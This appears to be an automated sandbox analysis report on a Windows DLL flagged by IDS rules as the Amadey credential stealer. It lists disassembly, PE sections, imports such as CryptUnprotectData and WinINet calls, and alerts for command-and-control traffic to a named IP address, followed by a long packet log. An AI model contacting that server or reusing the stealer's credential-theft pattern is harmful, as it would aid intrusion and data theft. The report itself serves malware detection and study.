                                                                      call 00007F0859047156h
                                                                      int3
                                                                      dec eax
                                                                      mov dword ptr [esp+10h], ebx
                                                                      dec eax
                                                                      mov dword ptr [esp+18h], esi
                                                                      push edi
                                                                      dec eax
                                                                      sub esp, 10h
                                                                      xor eax, eax
                                                                      xor ecx, ecx
                                                                      cpuid
                                                                      inc esp
                                                                      mov eax, ecx
                                                                      inc ebp
                                                                      xor ebx, ebx
                                                                      inc esp
                                                                      mov ecx, ebx
                                                                      inc ecx
                                                                      xor eax, 6C65746Eh
                                                                      inc ecx
                                                                      xor ecx, 756E6547h
                                                                      inc esp
                                                                      mov edx, edx
                                                                      mov esi, eax
                                                                      xor ecx, ecx
                                                                      inc ecx
                                                                      lea eax, dword ptr [ebx+01h]
                                                                      inc ebp
                                                                      or ecx, eax
                                                                      cpuid
                                                                      inc ecx
                                                                      xor edx, 49656E69h
                                                                      mov dword ptr [esp], eax
                                                                      inc ebp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x127e00 | 0x58 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x127e58 | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x142000 | 0xf8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x136000 | 0xae9c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x143000 | 0x126c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1194c0 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x119530 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xfe000 | 0x600 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xfc7d0 | 0xfc800 | 974673a51250f4e87dcc26eaa48952f6 | False | 0.5002552599009901 | data | 6.448659753395251 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xfe000 | 0x2b31e | 0x2b400 | fbb88beaa32195b981c2a59a1af2bc97 | False | 0.4419255780346821 | data | 5.689346666675183 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x12a000 | 0xbb8c | 0x4400 | 61d31a77fefa0f32c01e3f3bc17f6803 | False | 0.1189108455882353 | DOS executable (block device driver \322f\324\377\3772) | 2.1677539241948747 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x136000 | 0xae9c | 0xb000 | e4078c360762dca3d61be203aa183883 | False | 0.4589621803977273 | data | 6.057856540511637 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x141000 | 0xfc | 0x200 | e6b0804fe5391dcc441dbda6a53f9f66 | False | 0.326171875 | data | 2.4656798618339506 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x142000 | 0xf8 | 0x200 | 193fc41b7ab2ce83170d116dba1ce3ac | False | 0.3359375 | data | 2.5236806502270213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x143000 | 0x126c | 0x1400 | 899e8e612e41b578dba238a8e36a5e4b | False | 0.425390625 | data | 5.2926472964845 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x142060 | 0x91 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.8689655172413793
DLL | Import
CRYPT32.dll | CryptUnprotectData
KERNEL32.dll | GetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, WaitForSingleObject, CreateFileW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, MultiByteToWideChar, Sleep, GetTempPathA, FormatMessageW, GetDiskFreeSpaceA, GetLastError, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, CloseHandle, GetSystemInfo, LoadLibraryW, HeapAlloc, HeapCompact, HeapDestroy, UnlockFile, GetProcAddress, CreateFileMappingA, LocalFree, LockFileEx, GetFileSize, DeleteCriticalSection, GetCurrentProcessId, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, WideCharToMultiByte, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, CreateFileMappingW, MapViewOfFile, QueryPerformanceCounter, GetTickCount, FlushFileBuffers, SetHandleInformation, FindFirstFileA, Wow64DisableWow64FsRedirection, K32GetModuleFileNameExW, FindNextFileA, CreatePipe, PeekNamedPipe, lstrlenA, FindClose, GetCurrentDirectoryA, lstrcatA, OpenProcess, SetCurrentDirectoryA, CreateToolhelp32Snapshot, ProcessIdToSessionId, CopyFileA, Wow64RevertWow64FsRedirection, Process32NextW, Process32FirstW, CreateThread, CreateProcessA, CreateDirectoryA, WriteConsoleW, InitializeCriticalSection, LeaveCriticalSection, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, GetFullPathNameW, EnterCriticalSection, HeapFree, HeapCreate, TryEnterCriticalSection, ReadFile, AreFileApisANSI, SetFilePointer, ReadConsoleW, SetFilePointerEx, GetFileSizeEx, GetConsoleMode, GetConsoleOutputCP, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetStdHandle, GetCurrentDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InitializeSListHead, LCMapStringEx, InitializeCriticalSectionEx, EncodePointer, DecodePointer, CompareStringEx, GetCPInfo, GetStringTypeW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, InterlockedFlushSList, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ExitProcess, GetModuleFileNameW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetStdHandle
ADVAPI32.dll | RegQueryValueExA, RegEnumValueW, RegEnumKeyA, RegCloseKey, RegQueryInfoKeyW, RegOpenKeyA, RegOpenKeyExA, GetSidSubAuthorityCount, GetSidSubAuthority, GetUserNameA, RegEnumKeyExW, LookupAccountNameA, GetSidIdentifierAuthority
SHELL32.dll | SHGetFolderPathA, SHFileOperationA
WININET.dll | HttpOpenRequestA, InternetWriteFile, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, HttpAddRequestHeadersA, HttpSendRequestExW, HttpEndRequestA, InternetOpenW
bcrypt.dll | BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptGenerateSymmetricKey, BCryptDecrypt
Name | Ordinal | Address
Main | 1 | 0x1800bfaf0
Save | 2 | 0x1800056a0
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T06:38:24.614773+0100 | 2855239 | ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) | 1 | 192.168.2.4 | 49730 | 212.193.31.8 | 80 | TCP
2024-12-23T06:38:24.614773+0100 | 2856150 | ETPRO MALWARE Amadey CnC Activity M6 | 1 | 192.168.2.4 | 49730 | 212.193.31.8 | 80 | TCP
2024-12-23T06:38:24.630041+0100 | 2855239 | ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) | 1 | 192.168.2.4 | 49731 | 212.193.31.8 | 80 | TCP
2024-12-23T06:38:24.630041+0100 | 2856150 | ETPRO MALWARE Amadey CnC Activity M6 | 1 | 192.168.2.4 | 49731 | 212.193.31.8 | 80 | TCP
2024-12-23T06:38:30.770706+0100 | 2855239 | ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) | 1 | 192.168.2.4 | 49732 | 212.193.31.8 | 80 | TCP
2024-12-23T06:38:30.770706+0100 | 2856150 | ETPRO MALWARE Amadey CnC Activity M6 | 1 | 192.168.2.4 | 49732 | 212.193.31.8 | 80 | TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 23, 2024 06:38:39.736293077 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736323118 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736351967 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736453056 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736484051 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736512899 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736541986 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736572027 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736793995 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736828089 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736856937 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736891031 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736917973 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736944914 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736973047 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737000942 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737027884 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737056017 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737088919 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737117052 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737148046 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737174988 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737200975 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737234116 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737258911 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737409115 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737437010 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737468004 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737495899 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737523079 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737550020 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737657070 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737684965 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737762928 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737790108 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737823009 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737910032 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737938881 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737965107 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737993956 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738020897 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738214016 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738239050 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738276005 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738293886 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738320112 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738347054 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738377094 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738401890 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738429070 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738456011 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738486052 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738512039 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738543034 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738567114 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738593102 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738713026 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738742113 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738770962 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738878965 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738910913 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738984108 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739012003 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739041090 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739069939 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739145041 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739170074 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739203930 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739229918 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739260912 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739285946 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739492893 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739520073 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739548922 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739574909 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739605904 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739633083 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739661932 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739685059 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739718914 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739746094 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739775896 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739801884 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739830017 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739857912 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739983082 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740009069 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740036011 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740061998 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740137100 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740164042 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740191936 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740217924 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740247011 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740319014 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740345955 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740371943 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740400076 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740428925 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740497112 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740525007 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740550041 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740576029 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740607977 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740776062 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740803957 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740832090 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740858078 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740884066 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740915060 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740940094 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740968943 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740994930 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741019964 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741054058 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741075993 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741099119 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741126060 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741157055 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741183043 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741313934 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741338968 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741364002 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741471052 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741502047 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741527081 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741596937 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741626978 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741650105 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741677999 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741774082 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741799116 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741827011 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741853952 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742037058 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742068052 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742100000 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742126942 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742153883 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742185116 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742209911 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742238045 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742265940 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742291927 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742320061 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742347002 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742371082 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742400885 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742535114 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742564917 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742594004 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742623091 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742651939 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742729902 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742760897 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742788076 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742815018 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742847919 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742940903 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742969036 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743041039 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743067026 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743093967 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743129015 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743161917 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743185043 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743572950 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743604898 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743633032 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743659973 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743690014 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743716955 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743743896 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743772030 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743798018 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743824959 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743853092 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743879080 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743912935 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743936062 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743963003 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744091988 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744119883 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744147062 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744175911 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744208097 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744329929 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744362116 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744434118 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744462013 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744489908 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744594097 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744625092 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744652033 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744677067 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744709969 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744914055 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744914055 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744937897 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744988918 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745017052 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745043993 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745069981 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745095015 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745121002 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745152950 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.754995108 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755014896 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755045891 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755069971 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755110979 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755124092 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755183935 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755275965 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755299091 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755359888 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755405903 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755446911 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755490065 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755522013 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755551100 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755707026 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755737066 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755767107 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755795956 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.755825043 CET4974080192.168.2.4212.193.31.8
